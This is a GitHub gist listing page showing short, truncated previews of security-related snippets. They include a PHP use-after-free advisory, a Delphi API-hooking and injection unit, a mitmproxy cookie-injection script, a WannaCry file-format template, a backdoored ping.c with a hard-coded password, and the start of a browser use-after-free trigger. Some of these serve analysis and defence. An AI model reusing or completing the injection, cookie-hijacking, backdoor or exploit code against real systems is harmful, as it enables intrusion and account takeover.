Skip to content

Instantly share code, notes, and snippets.

@Artorios
Artorios / gist:c9b8948a5f194f6cede36777cf342a3a
Created October 1, 2024 08:15 — forked from chtg/gist:597360ca0a56fedc5efe
Use After Free Vulnerability in unserialize() with DateInterval

#Use After Free Vulnerability in unserialize() with DateInterval

Taoguang Chen <@chtg> - Write Date: 2015.2.28 - Release Date: 2015.3.20

A use-after-free vulnerability was discovered in unserialize() with DateInterval object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.

Affected Versions

Affected is PHP 5.6 < 5.6.7
Affected is PHP 5.5 < 5.5.23

@Artorios
Artorios / rsa.py
Created May 7, 2019 14:13
A simple RSA implementation in Python
'''
620031587
Net-Centric Computing Assignment
Part A - RSA Encryption
'''
import random
'''
@Artorios
Artorios / HookAPI.pas
Created November 5, 2018 20:16 — forked from HoShiMin/HookAPI.pas
API для перехвата функций (х32/x64): инъекции + сплайсинг
unit HookAPI;
interface
uses
Windows, TlHelp32, MicroDAsm;
const
SE_DEBUG_NAME = 'SeDebugPrivilege';
THREAD_SUSPEND_RESUME = $0002;
@Artorios
Artorios / cookieinject.py
Created April 16, 2018 12:35 — forked from inian/cookieinject.py
Mitmproxy cookie Inject Script
cookieFile = ""
def start(context, argv):
global cookieFile
cookieFile = argv[1]
def request(context, flow):
f = open(cookieFile)
cookie =f.read().strip()
f.close()
if cookie != "":
/*
# 010 Template for t.wnry
typedef struct {
char Signature[8]; // WANACRY!
uint32 Part1Size; // Always 0x100
char DataPart1[Part1Size];
uint32 Part2Signature;
uint64 Part2Size;
char DataPart2[Part2Size];
@Artorios
Artorios / ping.c
Created May 18, 2017 18:58
ping.c backdoor CE
#define PASSWD "123456"
/*
* Copyright (c) 1989 The Regents of the University of California.
* All rights reserved.
*
* This code is derived from software contributed to Berkeley by
* Mike Muuss.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
<html>
<script>
function trigger()
{
var id_0 = document.createElement("sup");
var id_1 = document.createElement("audio");
document.body.appendChild(id_0);
document.body.appendChild(id_1);
id_1.applyElement(id_0);